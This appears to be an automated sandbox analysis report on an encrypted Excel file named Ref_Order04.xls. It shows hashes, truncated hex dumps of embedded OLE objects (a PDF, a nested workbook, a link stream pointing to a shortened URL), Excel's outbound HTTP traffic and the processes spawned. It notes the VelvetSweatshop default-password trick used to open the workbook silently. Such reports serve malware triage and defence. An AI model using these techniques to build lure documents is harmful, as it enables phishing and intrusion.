SHA-256: | 3FD72127EF7CA095F58D8A3348BCA17479F12B9CFC6D10B8F43CF868329090CB |
SHA-512: | 75087589A8FDBEAD05F6F31914B52A9825904A105A8C68FACA5123DF5EB76F789ADBC0F5D3260057C27735CD78C623BDFECC69C38FC54E62709076CFAFD4E1F1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 355328 |
Entropy (8bit): | 7.8384390402996065 |
Encrypted: | false |
SSDEEP: | 6144:uSunQxEtjPOtioVjDGUU1qfDlavx+fgLX0d6XivFbVIO/Z6wXlyeFf5mTy/1zwqs:uTZYbVDMwXlHNmy/5Xl8D |
MD5: | FB94BDA2B8A5908CA1EFDAA64278667C |
SHA1: | C581CA896A6EA34CC8A8346D75918FC883699FA5 |
SHA-256: | 3FD72127EF7CA095F58D8A3348BCA17479F12B9CFC6D10B8F43CF868329090CB |
SHA-512: | 75087589A8FDBEAD05F6F31914B52A9825904A105A8C68FACA5123DF5EB76F789ADBC0F5D3260057C27735CD78C623BDFECC69C38FC54E62709076CFAFD4E1F1 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.533011884584972 |
TrID: | |
File name: | Ref_Order04.xls |
File size: | 303'616 bytes |
MD5: | 5b24902f7744cc11bd53c183497fbaf7 |
SHA1: | b70311f80381bd3b80d65a99e46bc390f91ea576 |
SHA256: | 2b49a09f9adf8b45deac6c22dd8ff0409fff3092196327c4e231ae4245a289a1 |
SHA512: | 27f77510e3b6b8719913f5b6af939f2a3c34d266d70f0e2531149a77ee9ad9f46f639eb27f1b59e892a5d4860b44b2ed9361a59bca932c4310a5e54cb5f4e88a |
SSDEEP: | 6144:vYunnY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVhiMIoxLbsbvEMPLNhdG:vBK3bVhiMIsLJMjNhdG |
TLSH: | 2F54E011FE418716E465477198F70FAA6265FC412F934B0B325CFA2D3DF02E86D2BA62 |
File Content Preview: | ........................>......................................................./.......b...................................................................................................................................................................... |
Icon Hash: | 276ea3a6a6b7bfbf |
Document Type: | OLE |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | Microsoft Excel |
Encrypted Document: | True (Excel nevertheless rendered the workbook unattended under the default cookbook, with no password typed, which is consistent with the default password Excel tries silently for encrypted workbooks, VelvetSweatshop, and with the Obfuscated Files or Information entry in the matrix) |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Code Page: | 1252 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2024-04-23 06:24:16 |
Creating Application: | |
Security: | 1 |
Document Code Page: | 1252 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 786432 |
General | |
Stream Path: | \x1CompObj |
CLSID: | |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.25248375192737 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x5DocumentSummaryInformation |
CLSID: | |
File Type: | data |
Stream Size: | 244 |
Entropy: | 2.889430592781307 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00 |
General | |
Stream Path: | \x5SummaryInformation |
CLSID: | |
File Type: | data |
Stream Size: | 200 |
Entropy: | 3.2603503175049817 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . F . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00 |
General | |
Stream Path: | MBD0001E584/\x1CompObj |
CLSID: | |
File Type: | data |
Stream Size: | 94 |
Entropy: | 4.345966460061678 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | MBD0001E584/\x1Ole |
CLSID: | |
File Type: | data |
Stream Size: | 62 |
Entropy: | 2.7788384466112834 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 3 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 33 00 |
Stream Path: MBD0001E584/CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 20909
General | |
Stream Path: | MBD0001E584/CONTENTS |
CLSID: | |
File Type: | PDF document, version 1.7, 1 pages |
Stream Size: | 20909 |
Entropy: | 7.967116806702583 |
Base64 Encoded: | True |
Data ASCII: | % P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 3 0 R . > > . e n d o b j . 4 0 o b j . < < . / P r o d u c e r ( 3 . 0 . 4 \\ ( 5 . 0 . 8 \\ ) ) . / M o d D a t e ( D : 2 0 2 3 0 9 2 2 0 3 2 2 4 8 + 0 2 ' 0 0 ' ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / P a g e s . / K i d s [ 5 0 R ] . / C o u n t 1 . > > . e n d o b j . 3 0 o b j . < < . / F i e l d s [ ] . / D R 6 0 R . > > . e n d |
Data Raw: | 25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 33 2e 30 2e 34 20 5c 28 35 2e 30 2e 38 5c 29 20 29 0a 2f 4d 6f 64 44 61 74 65 |
General | |
Stream Path: | MBD0001E585/\x1CompObj |
CLSID: | |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.25248375192737 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | MBD0001E585/\x5DocumentSummaryInformation |
CLSID: | |
File Type: | data |
Stream Size: | 708 |
Entropy: | 3.6235698530352805 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00 |
General | |
Stream Path: | MBD0001E585/\x5SummaryInformation |
CLSID: | |
File Type: | data |
Stream Size: | 23248 |
Entropy: | 3.0259101830314297 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 5a 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 f4 00 00 00 |
General | |
Stream Path: | MBD0001E585/Workbook |
CLSID: | |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 97808 |
Entropy: | 7.365133585376088 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
General | |
Stream Path: | MBD0001E586/\x1Ole |
CLSID: | |
File Type: | data |
Stream Size: | 428 |
Entropy: | 6.141664411264563 |
Base64 Encoded: | False |
Data ASCII: | . . . . t 8 # G . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . b . u . n . . . i . s . / . m . j . a . i . 3 . 9 . . . . - j . \\ A . 8 9 . 1 ? . F . G D Q | u c U * # . - . . L . g 6 v . . ! x . . . ( - b g < m . . U D b S Q . . U M & . L % 4 d . . t $ ~ . U . . . H E ; . . b . y D v . V M g . . . _ Y r . D . . . . . . . . . . . . . . . . b . . . 4 . 4 . O . n . w . e . B . s . b . w . Z . 8 . k . V . j . l . i . L . I . g . s . e . 6 . e . 9 . K . m . K . e . Y . s . 5 . i . n |
Data Raw: | 01 00 00 02 99 74 da 38 f2 23 c3 47 00 00 00 00 00 00 00 00 00 00 00 00 ea 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e6 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 62 00 75 00 6e 00 2e 00 69 00 73 00 2f 00 6d 00 6a 00 61 00 69 00 33 00 39 00 00 00 08 2d 6a 16 5c 41 a7 19 38 39 ea 16 31 3f 0b 98 b8 46 d6 89 47 44 51 7c b2 75 ec e3 63 97 d3 55 92 2a 23 d3 92 b7 |
General | |
Stream Path: | Workbook |
CLSID: | |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 152273 |
Entropy: | 7.995741186212055 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . / . 6 . . . . . . . 4 . $ . . > . ( { i 9 . . 9 { z \\ : ? I 7 . 5 } x u z . . . . . . . . . . . \\ . p . - S } - u I K . O s Y . } . ? . . / O D l . ) / % . ] c . 0 . \\ B z b ] - [ j X Z Y . . ' V . . 0 ] ] I - 6 y # r _ ! l . . ? S B . . . e a . . . . . . = . . . q . ( . . . = g . J b . U . d F . . . . ? 2 . . . . . . . . & . . . . . . . . . . . . . P @ = . . . P , . " f _ @ . . . . . . . J " . . . ^ . . . . . b . . . . . . . . d 1 . . . y ? . . . y $ \\ J D F H L . . . t |
Data Raw: | 09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 ec 34 8c 06 eb 24 fe 01 dd 7f 3e f5 e5 05 28 a8 d8 7b 69 bf 9c 39 10 94 16 39 ce 7b 7a e2 9b 5c 3a ad a6 3f 49 37 12 96 97 8e 35 7d 78 75 7a cc e1 00 02 00 b0 04 c1 00 02 00 16 98 e2 00 00 00 5c 00 70 00 2d 53 7d a6 c0 cb 2d 75 49 4b 08 4f 73 59 e1 ab d2 9c 7d 18 20 3f a3 b3 f9 13 b1 0a a3 b1 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 24, 2024 06:51:00.066986084 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.226533890 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.226705074 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.227014065 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.386332035 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.404850006 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.404886007 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.404968023 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405000925 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405024052 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405024052 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405024052 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405031919 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405061960 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405061960 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405065060 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405095100 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405114889 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405127048 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405162096 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.405201912 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405201912 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405201912 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.405630112 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.411715031 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:00.411789894 CEST | 49165 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:00.567353964 CEST | 80 | 49165 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:18.796511889 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:18.956057072 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:18.956332922 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:18.956476927 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.115734100 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.133929968 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134038925 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134079933 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134128094 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134134054 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134177923 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134181976 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134231091 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134241104 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134284019 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134295940 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134298086 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.134332895 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134355068 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.134458065 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.139707088 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Apr 24, 2024 06:51:19.139796972 CEST | 49166 | 80 | 192.168.2.22 | 76.76.21.98 |
Apr 24, 2024 06:51:19.294823885 CEST | 80 | 49166 | 76.76.21.98 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 24, 2024 06:50:59.888587952 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 24, 2024 06:51:00.059905052 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 24, 2024 06:50:59.888587952 CEST | 192.168.2.22 | 8.8.8.8 | 0x10d9 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 24, 2024 06:51:00.059905052 CEST | 8.8.8.8 | 192.168.2.22 | 0x10d9 | No error (0) | | | 76.76.21.98 | A (IP address) | IN (0x0001) | false |
Apr 24, 2024 06:51:00.059905052 CEST | 8.8.8.8 | 192.168.2.22 | 0x10d9 | No error (0) | | | 76.76.21.142 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 76.76.21.98 | 80 | 1908 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 24, 2024 06:51:00.227014065 CEST | 319 | OUT | |
Apr 24, 2024 06:51:00.404850006 CEST | 45 | IN | |
Apr 24, 2024 06:51:00.404886007 CEST | 2 | IN | |
Apr 24, 2024 06:51:00.404968023 CEST | 12 | IN | |
Apr 24, 2024 06:51:00.405000925 CEST | 8 | IN | |
Apr 24, 2024 06:51:00.405031919 CEST | 23 | IN | |
Apr 24, 2024 06:51:00.405065060 CEST | 2 | IN | |
Apr 24, 2024 06:51:00.405095100 CEST | 7 | IN | |
Apr 24, 2024 06:51:00.405127048 CEST | 63 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.22 | 49166 | 76.76.21.98 | 80 | 1908 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 24, 2024 06:51:18.956476927 CEST | 319 | OUT | |
Apr 24, 2024 06:51:19.133929968 CEST | 45 | IN | |
Apr 24, 2024 06:51:19.134079933 CEST | 14 | IN | |
Apr 24, 2024 06:51:19.134128094 CEST | 10 | IN | |
Apr 24, 2024 06:51:19.134177923 CEST | 21 | IN | |
Apr 24, 2024 06:51:19.134241104 CEST | 9 | IN | |
Apr 24, 2024 06:51:19.134284019 CEST | 63 | IN |
Target ID: | 0 |
Start time: | 06:50:37 |
Start date: | 24/04/2024 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f070000 |
File size: | 28'253'536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 06:51:05 |
Start date: | 24/04/2024 |
Path: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1360000 |
File size: | 2'525'680 bytes |
MD5 hash: | 2F8D93826B8CBF9290BC57535C7A6817 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 06:51:20 |
Start date: | 24/04/2024 |
Path: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd0000 |
File size: | 9'805'808 bytes |
MD5 hash: | 326A645391A97C760B60C558A35BB068 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |